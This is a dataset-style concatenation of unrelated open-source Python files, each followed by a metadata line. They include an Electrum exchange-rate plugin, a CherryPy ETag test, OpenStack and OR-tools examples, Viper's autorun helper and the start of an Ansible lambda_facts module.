            resp_currencies = self.get_json('api.coindesk.com', "/v1/bpi/supported-currencies.json")
        except Exception:
            return
        quote_currencies = {}
        for cur in resp_currencies:
            quote_currencies[str(cur["currency"])] = 0.0
        with self.lock:
            self.quote_currencies = quote_currencies
        self.parent.set_currencies(quote_currencies)
    def update_wd(self):
        try:
            winkresp = self.get_json('winkdex.com', "/static/data/0_600_288.json")
            ####could need nonce value in GET, no Docs available
        except Exception:
            return
        quote_currencies = {"USD": 0.0}
        ####get y of highest x in "prices"
        lenprices = len(winkresp["prices"])
        usdprice = winkresp["prices"][lenprices-1]["y"]
        try:
            quote_currencies["USD"] = decimal.Decimal(usdprice)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_cv(self):
        try:
            jsonresp = self.get_json('www.cavirtex.com', "/api/CAD/ticker.json")
        except Exception:
            return
        quote_currencies = {"CAD": 0.0}
        cadprice = jsonresp["last"]
        try:
            quote_currencies["CAD"] = decimal.Decimal(cadprice)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_CNY(self):
        try:
            jsonresp = self.get_json('data.btcchina.com', "/data/ticker")
        except Exception:
            return
        quote_currencies = {"CNY": 0.0}
        cnyprice = jsonresp["ticker"]["last"]
        try:
            quote_currencies["CNY"] = decimal.Decimal(cnyprice)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_bp(self):
        try:
            jsonresp = self.get_json('bitpay.com', "/api/rates")
        except Exception:
            return
        quote_currencies = {}
        try:
            for r in jsonresp:
                quote_currencies[str(r["code"])] = decimal.Decimal(r["rate"])
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_cb(self):
        try:
            jsonresp = self.get_json('coinbase.com', "/api/v1/currencies/exchange_rates")
        except Exception:
            return
        quote_currencies = {}
        try:
            # Coinbase returns keys like "btc_to_usd"; keep only those.
            for r in jsonresp:
                if r[:7] == "btc_to_":
                    quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_bc(self):
        try:
            jsonresp = self.get_json('blockchain.info', "/ticker")
        except Exception:
            return
        quote_currencies = {}
        try:
            for r in jsonresp:
                quote_currencies[r] = self._lookup_rate(jsonresp, r)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_lb(self):
        try:
            jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/")
        except Exception:
            return
        quote_currencies = {}
        try:
            for r in jsonresp:
                quote_currencies[r] = self._lookup_rate_lb(jsonresp, r)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_bv(self):
        try:
            jsonresp = self.get_json('api.bitcoinvenezuela.com', "/")
        except Exception:
            return
        quote_currencies = {}
        try:
            for r in jsonresp["BTC"]:
                quote_currencies[r] = Decimal(jsonresp["BTC"][r])
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def update_ba(self):
        try:
            jsonresp = self.get_json('api.bitcoinaverage.com', "/ticker/global/all")
        except Exception:
            return
        quote_currencies = {}
        try:
            for r in jsonresp:
                if not r == "timestamp":
                    quote_currencies[r] = self._lookup_rate_ba(jsonresp, r)
            with self.lock:
                self.quote_currencies = quote_currencies
        except KeyError:
            pass
        self.parent.set_currencies(quote_currencies)
    def get_currencies(self):
        """Return the sorted list of currency codes with a known rate."""
        return [] if self.quote_currencies is None else sorted(self.quote_currencies.keys())
    # Per-exchange helpers extracting the rate for one currency from the
    # raw JSON response.
    def _lookup_rate(self, response, quote_id):
        return decimal.Decimal(str(response[str(quote_id)]["15m"]))
    def _lookup_rate_cb(self, response, quote_id):
        return decimal.Decimal(str(response[str(quote_id)]))
    def _lookup_rate_ba(self, response, quote_id):
        return decimal.Decimal(response[str(quote_id)]["last"])
    def _lookup_rate_lb(self, response, quote_id):
        return decimal.Decimal(response[str(quote_id)]["rates"]["last"])
class Plugin(BasePlugin):
    """GUI plugin that shows the wallet balance (and optionally the
    transaction history) converted to a fiat currency, using one of
    several exchange-rate providers polled by an Exchanger thread."""
    def fullname(self):
        return "Exchange rates"
    def description(self):
        return """exchange rates, retrieved from blockchain.info, CoinDesk, or Coinbase"""
    def __init__(self,a,b):
        BasePlugin.__init__(self,a,b)
        # Seed with the saved settings until the Exchanger thread reports
        # the real supported lists.
        self.currencies = [self.config.get('currency', "EUR")]
        self.exchanges = [self.config.get('use_exchange', "Blockchain")]
    def init(self):
        self.win = self.gui.main_window
        self.win.connect(self.win, SIGNAL("refresh_currencies()"), self.win.update_status)
        self.btc_rate = Decimal(0.0)
        # Do price discovery
        self.exchanger = Exchanger(self)
        self.exchanger.start()
        self.gui.exchanger = self.exchanger # keep a reference for the rest of the GUI
    def set_currencies(self, currency_options):
        """Called back from the Exchanger thread with the currencies the
        selected exchange supports."""
        self.currencies = sorted(currency_options)
        self.win.emit(SIGNAL("refresh_currencies()"))
        self.win.emit(SIGNAL("refresh_currencies_combo()"))
    def set_quote_text(self, btc_balance, r):
        # btc_balance is in satoshis; the result is written into r[0]
        # because this is invoked via a callback that cannot return.
        r[0] = self.create_quote_text(Decimal(btc_balance) / 100000000)
    def create_quote_text(self, btc_balance):
        """Return *btc_balance* (in BTC) formatted in the configured fiat
        currency, or an empty string when no rate is available yet."""
        quote_currency = self.config.get("currency", "EUR")
        self.exchanger.use_exchange = self.config.get("use_exchange", "Blockchain")
        cur_rate = self.exchanger.exchange(Decimal(1.0), quote_currency)
        if cur_rate is None:
            quote_text = ""
        else:
            quote_balance = btc_balance * Decimal(cur_rate)
            self.btc_rate = cur_rate
            quote_text = "%.2f %s" % (quote_balance, quote_currency)
        return quote_text
    def load_wallet(self, wallet):
        # Cache a tx_hash -> {value, timestamp, balance} map used by
        # history_tab_update().
        self.wallet = wallet
        tx_list = {}
        for item in self.wallet.get_tx_history(self.wallet.storage.get("current_account", None)):
            tx_hash, conf, is_mine, value, fee, balance, timestamp = item
            tx_list[tx_hash] = {'value': value, 'timestamp': timestamp, 'balance': balance}
        self.tx_list = tx_list
    def requires_settings(self):
        return True
    def toggle(self):
        out = BasePlugin.toggle(self)
        self.win.update_status()
        return out
    def close(self):
        # Ask the polling thread to stop.
        self.exchanger.stop()
    def history_tab_update(self):
        """Add a sixth 'Fiat Amount' column to the history list, valued
        with CoinDesk historical USD rates where available."""
        if self.config.get('history_rates', 'unchecked') == "checked":
            try:
                tx_list = self.tx_list
            except Exception:
                return
            # Date range: from the oldest transaction to today.
            try:
                mintimestr = datetime.datetime.fromtimestamp(int(min(tx_list.items(), key=lambda x: x[1]['timestamp'])[1]['timestamp'])).strftime('%Y-%m-%d')
            except ValueError:
                return
            maxtimestr = datetime.datetime.now().strftime('%Y-%m-%d')
            try:
                resp_hist = self.exchanger.get_json('api.coindesk.com', "/v1/bpi/historical/close.json?start=" + mintimestr + "&end=" + maxtimestr)
            except Exception:
                return
            self.gui.main_window.is_edit = True
            self.gui.main_window.history_list.setColumnCount(6)
            self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance'), _('Fiat Amount')] )
            root = self.gui.main_window.history_list.invisibleRootItem()
            childcount = root.childCount()
            for i in range(childcount):
                item = root.child(i)
                try:
                    tx_info = tx_list[str(item.data(0, Qt.UserRole).toPyObject())]
                except Exception:
                    # Transaction not in the cached map (e.g. arrived after
                    # load_wallet); fall back to the wallet history and
                    # value it at today's rate.
                    newtx = self.wallet.get_tx_history()
                    v = newtx[[x[0] for x in newtx].index(str(item.data(0, Qt.UserRole).toPyObject()))][3]
                    tx_info = {'timestamp':int(datetime.datetime.now().strftime("%s")), 'value': v }
                    pass
                tx_time = int(tx_info['timestamp'])
                tx_time_str = datetime.datetime.fromtimestamp(tx_time).strftime('%Y-%m-%d')
                try:
                    tx_USD_val = "%.2f %s" % (Decimal(tx_info['value']) / 100000000 * Decimal(resp_hist['bpi'][tx_time_str]), "USD")
                except KeyError:
                    # No historical rate for that day; use the current rate.
                    tx_USD_val = "%.2f %s" % (self.btc_rate * Decimal(tx_info['value'])/100000000 , "USD")
                item.setText(5, tx_USD_val)
                if Decimal(tx_info['value']) < 0:
                    item.setForeground(5, QBrush(QColor("#BC1E1E")))
            for i, width in enumerate(self.gui.main_window.column_widths['history']):
                self.gui.main_window.history_list.setColumnWidth(i, width)
            self.gui.main_window.history_list.setColumnWidth(4, 140)
            self.gui.main_window.history_list.setColumnWidth(5, 120)
            self.gui.main_window.is_edit = False
    def settings_widget(self, window):
        return EnterButton(_('Settings'), self.settings_dialog)
    def settings_dialog(self):
        """Modal dialog for choosing the exchange, the display currency
        and whether history rows get historical fiat values."""
        d = QDialog()
        layout = QGridLayout(d)
        layout.addWidget(QLabel(_('Exchange rate API: ')), 0, 0)
        layout.addWidget(QLabel(_('Currency: ')), 1, 0)
        layout.addWidget(QLabel(_('History Rates: ')), 2, 0)
        combo = QComboBox()
        combo_ex = QComboBox()
        hist_checkbox = QCheckBox()
        hist_checkbox.setEnabled(False)
        if self.config.get('history_rates', 'unchecked') == 'unchecked':
            hist_checkbox.setChecked(False)
        else:
            hist_checkbox.setChecked(True)
        ok_button = QPushButton(_("OK"))
        def on_change(x):
            # Currency combo changed; persist and re-check whether
            # historical rates are available (CoinDesk + USD only).
            try:
                cur_request = str(self.currencies[x])
            except Exception:
                return
            if cur_request != self.config.get('currency', "EUR"):
                self.config.set_key('currency', cur_request, True)
                if cur_request == "USD" and self.config.get('use_exchange', "Blockchain") == "CoinDesk":
                    hist_checkbox.setEnabled(True)
                else:
                    hist_checkbox.setChecked(False)
                    hist_checkbox.setEnabled(False)
                self.win.update_status()
        def disable_check():
            hist_checkbox.setChecked(False)
            hist_checkbox.setEnabled(False)
        def on_change_ex(x):
            # Exchange combo changed; persist, drop cached currencies and
            # wake the Exchanger thread for an immediate re-poll.
            cur_request = str(self.exchanges[x])
            if cur_request != self.config.get('use_exchange', "Blockchain"):
                self.config.set_key('use_exchange', cur_request, True)
                self.currencies = []
                combo.clear()
                self.exchanger.query_rates.set()
                if cur_request == "CoinDesk":
                    if self.config.get('currency', "EUR") == "USD":
                        hist_checkbox.setEnabled(True)
                    else:
                        disable_check()
                else:
                    disable_check()
                set_currencies(combo)
                self.win.update_status()
        def on_change_hist(checked):
            if checked:
                self.config.set_key('history_rates', 'checked')
                self.history_tab_update()
            else:
                self.config.set_key('history_rates', 'unchecked')
                self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance')] )
                self.gui.main_window.history_list.setColumnCount(5)
                for i,width in enumerate(self.gui.main_window.column_widths['history']):
                    self.gui.main_window.history_list.setColumnWidth(i, width)
        def set_hist_check(hist_checkbox):
            if self.config.get('use_exchange', "Blockchain") == "CoinDesk":
                hist_checkbox.setEnabled(True)
            else:
                hist_checkbox.setEnabled(False)
        def set_currencies(combo):
            current_currency = self.config.get('currency', "EUR")
            try:
                combo.clear()
            except Exception:
                return
            combo.addItems(self.currencies)
            try:
                index = self.currencies.index(current_currency)
            except Exception:
                index = 0
            combo.setCurrentIndex(index)
        def set_exchanges(combo_ex):
            try:
                combo_ex.clear()
            except Exception:
                return
            combo_ex.addItems(self.exchanges)
            try:
                index = self.exchanges.index(self.config.get('use_exchange', "Blockchain"))
            except Exception:
                index = 0
            combo_ex.setCurrentIndex(index)
        def ok_clicked():
            d.accept();
        set_exchanges(combo_ex)
        set_currencies(combo)
        set_hist_check(hist_checkbox)
        combo.currentIndexChanged.connect(on_change)
        combo_ex.currentIndexChanged.connect(on_change_ex)
        hist_checkbox.stateChanged.connect(on_change_hist)
        combo.connect(self.win, SIGNAL('refresh_currencies_combo()'), lambda: set_currencies(combo))
        combo_ex.connect(d, SIGNAL('refresh_exchanges_combo()'), lambda: set_exchanges(combo_ex))
        ok_button.clicked.connect(lambda: ok_clicked())
        layout.addWidget(combo,1,1)
        layout.addWidget(combo_ex,0,1)
        layout.addWidget(hist_checkbox,2,1)
        layout.addWidget(ok_button,3,1)
        if d.exec_():
            return True
        else:
            return False
| marlengit/electrum198 | plugins/exchange_rate.py | Python | gpl-3.0 | 18,608 | 0.00489 |
import cherrypy
from cherrypy.test import helper
class ETagTest(helper.CPWebCase):
    """Functional tests for the CherryPy ``etags`` tool (autotags mode)."""
    def setup_server():
        # Called by the test harness without an instance, hence the
        # staticmethod wrapping below.
        class Root:
            def resource(self):
                return "Oh wah ta goo Siam."
            resource.exposed = True
            def fail(self, code):
                # Raise a redirect for 3xx codes, an HTTP error otherwise.
                code = int(code)
                if 300 <= code <= 399:
                    raise cherrypy.HTTPRedirect([], code)
                else:
                    raise cherrypy.HTTPError(code)
            fail.exposed = True
            def unicoded(self):
                return u'I am a \u1ee4nicode string.'
            unicoded.exposed = True
            # Encode the unicode body so a stable ETag can be computed.
            unicoded._cp_config = {'tools.encode.on': True}
        conf = {'/': {'tools.etags.on': True,
                      'tools.etags.autotags': True,
                      }}
        cherrypy.tree.mount(Root(), config=conf)
    setup_server = staticmethod(setup_server)
    def test_etags(self):
        self.getPage("/resource")
        self.assertStatus('200 OK')
        self.assertHeader('Content-Type', 'text/html;charset=utf-8')
        self.assertBody('Oh wah ta goo Siam.')
        etag = self.assertHeader('ETag')
        # Test If-Match (both valid and invalid)
        self.getPage("/resource", headers=[('If-Match', etag)])
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "*")])
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "*")], method="POST")
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "a bogus tag")])
        self.assertStatus("412 Precondition Failed")
        # Test If-None-Match (both valid and invalid)
        self.getPage("/resource", headers=[('If-None-Match', etag)])
        self.assertStatus(304)
        self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)])
        self.assertStatus("412 Precondition Failed")
        self.getPage("/resource", headers=[('If-None-Match', "*")])
        self.assertStatus(304)
        self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")])
        self.assertStatus("200 OK")
    def test_errors(self):
        self.getPage("/resource")
        self.assertStatus(200)
        etag = self.assertHeader('ETag')
        # Test raising errors in page handler
        self.getPage("/fail/412", headers=[('If-Match', etag)])
        self.assertStatus(412)
        self.getPage("/fail/304", headers=[('If-Match', etag)])
        self.assertStatus(304)
        self.getPage("/fail/412", headers=[('If-None-Match', "*")])
        self.assertStatus(412)
        self.getPage("/fail/304", headers=[('If-None-Match', "*")])
        self.assertStatus(304)
    def test_unicode_body(self):
        # The same encoded unicode body must yield the same ETag on a
        # second, conditional request.
        self.getPage("/unicoded")
        self.assertStatus(200)
        etag1 = self.assertHeader('ETag')
        self.getPage("/unicoded", headers=[('If-Match', etag1)])
        self.assertStatus(200)
        self.assertHeader('ETag', etag1)
| evilhero/mylar | lib/cherrypy/test/test_etags.py | Python | gpl-3.0 | 3,071 | 0.003256 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from examples.connect import FLAVOR_NAME
from examples.connect import IMAGE_NAME
from examples.connect import NETWORK_NAME
from examples.connect import SERVER_NAME
"""
Managing profiles in the Cluster service.
For a full guide see
https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html
"""
def list_profiles(conn):
    """Print every cluster profile, then print them again sorted by name."""
    print("List Profiles:")
    for prof in conn.cluster.profiles():
        print(prof.to_dict())
    for prof in conn.cluster.profiles(sort='name:asc'):
        print(prof.to_dict())
def create_profile(conn):
    """Create an os.nova.server profile named 'os_server' and print it."""
    print("Create Profile:")
    server_properties = {
        'name': SERVER_NAME,
        'flavor': FLAVOR_NAME,
        'image': IMAGE_NAME,
        'networks': {'network': NETWORK_NAME},
    }
    spec = {
        'profile': 'os.nova.server',
        'version': 1.0,
        'properties': server_properties,
    }
    created = conn.cluster.create_profile('os_server', spec)
    print(created.to_dict())
def get_profile(conn):
    """Fetch the profile named 'os_server' and print it."""
    print("Get Profile:")
    prof = conn.cluster.get_profile('os_server')
    print(prof.to_dict())
def find_profile(conn):
    """Look up the profile named 'os_server' and print it."""
    print("Find Profile:")
    found = conn.cluster.find_profile('os_server')
    print(found.to_dict())
def update_profile(conn):
    """Rename the 'os_server' profile to 'old_server' and print the result."""
    print("Update Profile:")
    updated = conn.cluster.update_profile('os_server', name='old_server')
    print(updated.to_dict())
def delete_profile(conn):
    """Delete the profile named 'os_server' and confirm on stdout."""
    print("Delete Profile:")
    conn.cluster.delete_profile('os_server')
    print("Profile deleted.")
| briancurtin/python-openstacksdk | examples/cluster/profile.py | Python | apache-2.0 | 2,100 | 0 |
# coding: utf-8
from django.db import models
class Band(models.Model):
    """Minimal model exercised by the admin-ordering regression tests."""
    name = models.CharField(max_length=100)
    bio = models.TextField()
    rank = models.IntegerField()
    class Meta:
        # Default queryset ordering the tests rely on.
        ordering = ('name',)
| adviti/melange | thirdparty/google_appengine/lib/django_1_2/tests/regressiontests/admin_ordering/models.py | Python | apache-2.0 | 224 | 0.004464 |
#!/usr/bin/env python3
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from SetupTools.SetupConfig import SetupConfig
from Interface.Interface import Interface
import importlib
import logging
class Previewer:
    """Drive the Interface with the window classes named on the command line.

    Each argv entry names a class under ``Interface.Windows`` (module and
    class share the name); windows are shown one at a time and stepped with
    'prev'/'next' events fired by the interface.
    """
    def __init__(self):
        # Log to a dedicated preview log so real setup logs stay untouched.
        logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s')
        self.setupconfig = SetupConfig()
        self.interface = Interface(self.callback)
        self.interface.loop()

    def callback(self, event):
        # Invoked by the Interface event loop with a simple event name.
        if event == 'init':
            # Import and instantiate every window class requested on argv.
            self.windows = []
            self.window_index = 0
            for x in sys.argv[1:]:
                i = importlib.import_module("Interface.Windows."+x)
                cl = getattr(i, x)
                self.windows.append(cl(self.callback, self.setupconfig))
            self.interface.addwin(self.windows[self.window_index])
        elif event == 'prev':
            # NOTE(review): at index 0 this becomes -1, i.e. Python indexing
            # wraps to the *last* window — confirm that is intended.
            self.window_index -= 1
            self.interface.addwin(self.windows[self.window_index])
        elif event == 'next':
            self.window_index += 1
            if self.window_index == len(self.windows):
                # Past the last window: shut the interface down.
                self.interface.exit()
                return
            self.interface.addwin(self.windows[self.window_index])
# Run the previewer when executed directly (window class names on argv).
if __name__ == "__main__":
    Previewer()
| mame98/ArchSetup | scripts/debug-preview.py | Python | gpl-3.0 | 1,383 | 0.005061 |
#!/usr/bin/env python3
# Copyright 2010-2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple VRP with special locations which need to be visited at end of the route."""
# [START import]
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
# [END import]
def create_data_model():
    """Stores the data for the problem."""
    # Token demand per location: the depot (0) and the five special nodes
    # (1..5) consume nothing, every regular node (6..18) consumes one token.
    special = [0] * 6
    regular = [-1] * 13
    return {
        'tokens': special + regular,
        # just need to be big enough, not a limiting factor
        'vehicle_tokens': [20] * 4,
        'num_vehicles': 4,
        'depot': 0,
    }
def print_solution(manager, routing, solution):
    """Prints solution on console."""
    print(f'Objective: {solution.ObjectiveValue()}')
    token_dim = routing.GetDimensionOrDie('Token')
    overall_distance = 0
    overall_token = 0
    for vehicle_id in range(manager.GetNumberOfVehicles()):
        route_text = f'Route for vehicle {vehicle_id}:\n'
        index = routing.Start(vehicle_id)
        # Token cumul at the start node counts toward the grand total.
        overall_token += solution.Value(token_dim.CumulVar(index))
        route_distance = 0
        while not routing.IsEnd(index):
            node = manager.IndexToNode(index)
            tokens_here = solution.Value(token_dim.CumulVar(index))
            route_text += f' {node} Token({tokens_here}) -> '
            previous = index
            index = solution.Value(routing.NextVar(index))
            route_distance += routing.GetArcCostForVehicle(
                previous, index, vehicle_id)
        # Final (end) node of the route.
        node = manager.IndexToNode(index)
        tokens_here = solution.Value(token_dim.CumulVar(index))
        route_text += f' {node} Token({tokens_here})\n'
        route_text += f'Distance of the route: {route_distance}m\n'
        overall_distance += route_distance
        print(route_text)
    print('Total distance of all routes: {}m'.format(overall_distance))
    print('Total token of all routes: {}'.format(overall_token))
def main():
    """Solve the CVRP problem."""
    # Instantiate the data problem.
    data = create_data_model()
    # Create the routing index manager.
    manager = pywrapcp.RoutingIndexManager(len(data['tokens']),
                                           data['num_vehicles'], data['depot'])
    # Create Routing Model.
    routing = pywrapcp.RoutingModel(manager)

    # Create and register a transit callback.
    def distance_callback(from_index, to_index):
        """Returns the distance between the two nodes."""
        # Flat cost of 10 for every arc; the indices are irrelevant here.
        del from_index
        del to_index
        return 10

    transit_callback_index = routing.RegisterTransitCallback(distance_callback)
    routing.AddDimension(
        transit_callback_index,
        0,  # null slack
        3000,  # maximum distance per vehicle
        True,  # start cumul to zero
        'distance')
    distance_dimension = routing.GetDimensionOrDie('distance')
    distance_dimension.SetGlobalSpanCostCoefficient(100)
    # Define cost of each arc.
    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)

    # Add Token constraint.
    def token_callback(from_index):
        """Returns the number of token consumed by the node."""
        # Convert from routing variable Index to tokens NodeIndex.
        from_node = manager.IndexToNode(from_index)
        return data['tokens'][from_node]

    token_callback_index = routing.RegisterUnaryTransitCallback(token_callback)
    routing.AddDimensionWithVehicleCapacity(
        token_callback_index,
        0,  # null capacity slack
        data['vehicle_tokens'],  # vehicle maximum tokens
        False,  # start cumul to zero
        'Token')
    # Add constraint: special node can only be visited if token remaining is zero
    token_dimension = routing.GetDimensionOrDie('Token')
    for node in range(1, 6):
        index = manager.NodeToIndex(node)
        routing.solver().Add(token_dimension.CumulVar(index) == 0)
    # Instantiate route start and end times to produce feasible times.
    # [START depot_start_end_times]
    for i in range(manager.GetNumberOfVehicles()):
        routing.AddVariableMinimizedByFinalizer(
            token_dimension.CumulVar(routing.Start(i)))
        routing.AddVariableMinimizedByFinalizer(
            token_dimension.CumulVar(routing.End(i)))
    # [END depot_start_end_times]
    # Setting first solution heuristic.
    search_parameters = pywrapcp.DefaultRoutingSearchParameters()
    search_parameters.first_solution_strategy = (
        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
    search_parameters.local_search_metaheuristic = (
        routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)
    search_parameters.time_limit.FromSeconds(1)
    # Solve the problem.
    solution = routing.SolveWithParameters(search_parameters)
    # Print solution on console.
    # [START print_solution]
    if solution:
        print_solution(manager, routing, solution)
    else:
        print('No solution found !')
    # [END print_solution]
| google/or-tools | ortools/constraint_solver/samples/vrp_tokens.py | Python | apache-2.0 | 6,133 | 0.000326 |
# -*- coding: utf-8 -*-
# This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
from viper.common.out import print_info
from viper.common.out import print_error
from viper.common.out import print_output
from viper.core.plugins import __modules__
from viper.core.session import __sessions__
from viper.core.database import Database
from viper.core.config import __config__
from viper.core.storage import get_sample_path
cfg = __config__
def parse_commands(data):
    """Split a raw command line into its root command and argument list.

    Args:
        data: the command string, e.g. ``"yara scan -t"``.

    Returns:
        tuple: ``(root, args)`` where ``root`` is the first
        whitespace-separated token (``''`` when *data* is empty or
        whitespace-only) and ``args`` is the list of remaining tokens.
    """
    words = data.split()
    # Guard against empty/blank input: the previous version indexed
    # words[0] unconditionally, raising IndexError on an empty command.
    if not words:
        return '', []
    return words[0], words[1:]
def autorun_module(file_hash):
    """Run the commands configured under [autorun] against a sample.

    Opens a session for *file_hash* (if none is active) and executes each
    comma-separated command line from the configuration; commands may be
    chained with ';'. Depending on configuration flags, module output is
    stored in the database and/or echoed to the console.

    Args:
        file_hash: hash of the sample to analyse; no-op when falsy.
    """
    if not file_hash:
        return

    # Make sure a session is open on the requested sample.
    if not __sessions__.is_set():
        __sessions__.new(get_sample_path(file_hash))

    for cmd_line in cfg.autorun.commands.split(','):
        split_commands = cmd_line.split(';')

        for split_command in split_commands:
            split_command = split_command.strip()
            if not split_command:
                continue

            root, args = parse_commands(split_command)

            try:
                if root in __modules__:
                    print_info("Running command \"{0}\"".format(split_command))

                    module = __modules__[root]['obj']()
                    module.set_commandline(args)
                    module.run()

                    if cfg.modules.store_output and __sessions__.is_set():
                        Database().add_analysis(file_hash, split_command, module.output)

                    if cfg.autorun.verbose:
                        print_output(module.output)
                        del(module.output[:])
                else:
                    print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(cmd_line))
            # Previously a bare ``except:``, which also swallowed
            # SystemExit and KeyboardInterrupt; catch only real errors.
            except Exception:
                print_error("Viper was unable to complete the command {0}".format(cmd_line))
| kevthehermit/viper | viper/common/autorun.py | Python | bsd-3-clause | 1,981 | 0.002019 |
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module maturity/support metadata consumed by Ansible's documentation tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lambda_facts
short_description: Gathers AWS Lambda function details as Ansible facts
description:
- Gathers various details related to Lambda functions, including aliases, versions and event source mappings.
Use module M(lambda) to manage the lambda function itself, M(lambda_alias) to manage function aliases and
M(lambda_event) to manage lambda event source mappings.
version_added: "2.2"
options:
query:
description:
- Specifies the resource type for which to gather facts. Leave blank to retrieve all facts.
required: true
choices: [ "aliases", "all", "config", "mappings", "policy", "versions" ]
default: "all"
function_name:
description:
- The name of the lambda function for which facts are requested.
aliases: [ "function", "name"]
event_source_arn:
description:
- For query type 'mappings', this is the Amazon Resource Name (ARN) of the Amazon Kinesis or DynamoDB stream.
author: Pierre Jodouin (@pjodouin)
requirements:
- boto3
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
---
# Simple example of listing all info for a function
- name: List all for a specific function
lambda_facts:
query: all
function_name: myFunction
register: my_function_details
# List all versions of a function
- name: List function versions
lambda_facts:
query: versions
function_name: myFunction
register: my_function_versions
# List all lambda function versions
- name: List all function
lambda_facts:
query: all
max_items: 20
- name: show Lambda facts
debug:
var: lambda_facts
'''
RETURN = '''
---
lambda_facts:
description: lambda facts
returned: success
type: dict
lambda_facts.function:
description: lambda function list
returned: success
type: dict
lambda_facts.function.TheName:
description: lambda function information, including event, mapping, and version information
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn
import json
import datetime
import sys
import re
try:
from botocore.exceptions import ClientError
except ImportError:
pass # protected by AnsibleAWSModule
def fix_return(node):
    """
    fixup returned dictionary

    Recursively walk *node*, converting every datetime into its string
    form; lists and dicts are rebuilt with converted members, any other
    value passes through untouched.

    :param node: arbitrary nesting of dicts/lists/scalars
    :return: the same structure with datetimes stringified
    """
    if isinstance(node, datetime.datetime):
        return str(node)
    if isinstance(node, list):
        return [fix_return(entry) for entry in node]
    if isinstance(node, dict):
        return {key: fix_return(value) for key, value in node.items()}
    return node
def alias_details(client, module):
    """
    Returns list of aliases for a specified function.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict: {function_name: {'aliases': [...]}} in snake_case
    """
    facts = dict()

    name = module.params.get('function_name')
    if name:
        # Optional pagination controls.
        api_params = dict()
        if module.params.get('max_items'):
            api_params['MaxItems'] = module.params.get('max_items')
        if module.params.get('next_marker'):
            api_params['Marker'] = module.params.get('next_marker')
        try:
            facts.update(aliases=client.list_aliases(FunctionName=name, **api_params)['Aliases'])
        except ClientError as e:
            # A missing function simply has no aliases.
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                facts.update(aliases=[])
            else:
                module.fail_json_aws(e, msg="Trying to get aliases")
    else:
        module.fail_json(msg='Parameter function_name required for query=aliases.')

    return {name: camel_dict_to_snake_dict(facts)}
def all_details(client, module):
    """
    Returns all lambda related facts.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    # Pagination makes no sense when aggregating every fact category.
    if module.params.get('max_items') or module.params.get('next_marker'):
        module.fail_json(msg='Cannot specify max_items nor next_marker for query=all.')

    facts = dict()

    name = module.params.get('function_name')
    if name:
        # Merge every per-function fact category under the function name,
        # in the same order the original queries ran.
